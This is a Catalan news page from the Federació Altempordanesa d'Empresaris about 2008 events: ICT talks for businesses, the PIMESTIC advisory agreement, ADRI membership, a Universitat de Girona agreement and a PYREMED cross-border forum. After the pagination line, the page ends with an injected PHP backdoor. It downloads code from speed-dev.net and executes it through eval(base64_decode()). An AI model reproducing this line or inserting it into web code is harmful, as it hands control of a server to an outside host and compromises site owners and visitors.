Fae - Federació Alt empordanesa d'empreses

  • Increase font size
  • Default font size
  • Decrease font size


Cicle de 5 xerrades, adreçades a empresaris/res, directius i empreses del Alt Empordà  que vulguin aprofundir en el camp de les noves tecnologies.

A partir del mes de novembre la Cambra impartirà un cicle de 5 xerrades , a Figueres de 2 hores eminentment pràctiques, amb una periodicitat mensual, adreçades a empresaris/res, directius i empreses del Alt Empordà  que vulguin aprofundir en el camp de les noves tecnologies, i conèixer com millorar la competitivitat de les seves empreses a través de l’ús eficient de les tecnologies de la informació i la comunicació (TIC). (document pdf)

 

La Federació Altempordanesa d’Empresaris s’acull al Servei d’Orientació Pimestic mitjançant un conveni amb la Cambra de Comerç i AENTEG.

Gràcies al conveni que han subscrit el dia 15 de setembre de 2008 entre la Cambra de Comerç de Girona, AENTEG i la Federació Altempordanesa d’Empresaris, les empreses adscrites a aquesta federació podran gaudir de l’assessorament del servei d’orientació en noves tecnologies PIMESTIC. (document pdf)

 

Adhesió de la FAE a l’Associació (ADRI NORD-ORIENTAL DE CATALUNYA).

La associació ADRI té con objectius: Participar en el Programa de Desenvolupament Rural de Catalunya per aplicar la metodologia Leader, i promoure el desenvolupament sostenible dels municipis rurals de les comarques de l’Alt Empordà, la Garrotxa, Osona i el Pla de l’Estany en els seus àmbits industrial, comercial, agrícola, ramader, forestal, turístic i qualsevol altre tipus d’activitat, si bé lligant el seu creixement als criteris de desenvolupament sostenible.

 

La Universitat de Girona i la Federació Altempordanesa d’Empresaris signen un conveni de col·laboració.

El dia 9 de juny de 2008 ha tingut lloc a Les Àligues, seu del Rectorat de la Universitat de Girona, la trobada entre els representants de la Federació Altempordanesa d’Empresaris (FAE), Lluís Fita i Mariona Ferrer, i la rectora Anna M. Geli. (document pdf)

 

Forum Transfronterer, PYREMED. Palau de Congressos de Perpinyà.

El proper dijous dia 29 de maig de 2008, Pyremed - Associació dels serveis públics d’ocupació, les organitzacions patronals i els sindicats del Midi-Pyrénées, Languedoc-Roussillon i Catalunya -, organitza un fòrum transfronterer dedicat al treball amb la finalitat de facilitar informació sobre la mobilitat dels treballadors, a banda i banda de la frontera, i la contractació dels mateixos per part de les empreses. (document pdf)

 


Página 1 de 2

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));